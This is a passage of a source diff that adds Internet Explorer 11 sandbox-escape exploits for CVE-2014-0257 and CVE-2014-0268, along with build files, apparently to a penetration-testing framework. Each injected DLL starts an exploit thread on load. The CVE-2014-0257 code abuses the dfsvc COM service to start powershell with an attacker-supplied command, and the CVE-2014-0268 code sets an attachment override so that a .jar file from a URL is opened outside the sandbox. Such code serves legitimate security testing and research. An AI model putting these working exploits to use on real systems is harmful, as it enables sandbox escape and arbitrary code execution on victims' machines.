+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2013-5046.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp

@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h

@@ -0,0 +1,12 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
+#include "interfaces.h"

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp

@@ -0,0 +1,201 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+#define MAX_ENV 32767
+
+#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent")
+
+const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}";
+
+long GetSafeArrayLen(LPSAFEARRAY psa)
+{
+	long ubound = 0;
+
+	SafeArrayGetUBound(psa, 1, &ubound);
+
+	return ubound + 1;
+}
+
+mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount)
+{
+	LPSAFEARRAY methods = type->GetMethods_2();
+	mscorlib::_MethodInfoPtr ret;
+	LONG methodCount = GetSafeArrayLen(methods);
+
+	for (long i = 0; i < methodCount; ++i)
+	{
+		IUnknown* v = nullptr;
+
+		if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v)))
+		{
+			mscorlib::_MethodInfoPtr method = v;
+
+			bstr_t name = method->Getname();
+			LPSAFEARRAY params = method->GetParameters();
+			long paramCount = GetSafeArrayLen(params);
+
+			if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount)
+			{
+				ret = method;
+				break;
+			}
+		}
+	}
+
+	SafeArrayDestroy(methods);
+
+	return ret;
+}
+
+template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args)
+{
+	variant_t obj;
+	T retObj;
+
+	SAFEARRAY * psa;
+	SAFEARRAYBOUND rgsabound[1];
+
+	rgsabound[0].lLbound = 0;
+	rgsabound[0].cElements = (ULONG)args.size();
+	psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound);
+
+	for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies)
+	{
+		SafeArrayPutElement(psa, &indicies, &args[indicies]);
+	}
+
+	variant_t ret = method->Invoke_3(obj, psa);
+
+	if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH))
+	{
+		retObj = ret.punkVal;
+	}
+
+	SafeArrayDestroy(psa);
+
+	return retObj;
+}
+
+bstr_t GetEnv(LPWSTR env)
+{
+	WCHAR buf[MAX_ENV];
+
+	GetEnvironmentVariable(env, buf, MAX_ENV);
+
+	return buf;
+}
+
+void DoDfsvcExploit()
+{
+	CLSID clsid;
+
+	CLSIDFromString(CLSID_DFSVC, &clsid);
+
+	DebugPrintf("Starting DFSVC Exploit\n");
+
+	mscorlib::_ObjectPtr obj;
+
+	HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+
+	if (FAILED(hr))
+	{
+		WCHAR cmdline[] = L"dfsvc.exe";
+
+		STARTUPINFO startInfo = { 0 };
+		PROCESS_INFORMATION procInfo = { 0 };
+
+		// Start dfsvc (because we can due to the ElevationPolicy)
+		if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
+			nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
+		{
+			CloseHandle(procInfo.hProcess);
+			CloseHandle(procInfo.hThread);
+
+			// Just sleep to ensure it comes up
+			Sleep(4000);
+			hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+		}
+		else
+		{
+			DebugPrintf("Couldn't create service %d\n", GetLastError());
+		}
+	}
+
+	if (SUCCEEDED(hr))
+	{
+		try
+		{
+			mscorlib::_TypePtr type = obj->GetType();
+
+			// Get type of Type (note defaults to RuntimeType then TypeInfo)
+			type = type->GetType()->BaseType->BaseType;
+
+			DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
+
+			mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
+
+			DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
+
+			std::vector<variant_t> getTypeArgs;
+
+			getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
+
+			// Get process type
+			type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
+
+			if (type)
+			{
+				mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
+
+				if (startMethod)
+				{
+					std::vector<variant_t> startArgs;
+
+					startArgs.push_back(L"powershell");
+					startArgs.push_back(GetEnv(L"PSHCMD"));
+
+					ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
+				}
+				else
+				{
+					DebugPrintf("Couldn't find Start method");
+				}
+			}
+			else
+			{
+				DebugPrintf("Couldn't find Process Type");
+			}
+		}
+		catch (_com_error e)
+		{
+			DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
+		}
+	}
+	else
+	{
+		DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
+	}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);
+	DoDfsvcExploit();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj

@@ -0,0 +1,182 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2014-0257.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp

@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:		
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h

@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp

@@ -0,0 +1,81 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+#include <Exdisp.h>
+
+_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2));
+
+void DoSetAttachmentUserOverride()
+{
+	IShdocvwBroker* shdocvw = nullptr;
+
+	try
+	{	
+		HRESULT ret;
+		shdocvw = CreateSHDocVw();
+						
+		CLSID clsid;
+
+		CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid);
+
+		IWebBrowser2Ptr browser;
+
+		ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser));
+		if (FAILED(ret))
+		{
+			DebugPrintf("CoCreateInstance: %08X", ret);
+			throw new _com_error(ret);
+		}
+
+		DebugPrintf("browser: %p", browser);
+
+		unsigned char buf[1] = { 0 };
+
+		ret = shdocvw->SetAttachmentUserOverride(L"jarfile");
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed to set attachement user override\n");
+			throw new _com_error(ret);
+		}
+
+		bstr_t nav = L"http://www.dummy.local/testapp.jar";
+
+		DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr));			
+	}
+	catch (_com_error e)
+	{
+		DebugPrintf("Error during processing: %ls\n", e.ErrorMessage());
+	}	
+
+	if (shdocvw)
+	{
+		shdocvw->Release();
+		shdocvw = nullptr;
+	}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);
+	DoSetAttachmentUserOverride();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+
+	return 0;
+}

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj

@@ -0,0 +1,183 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+    <ProjectName>CVE-2014-0268</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
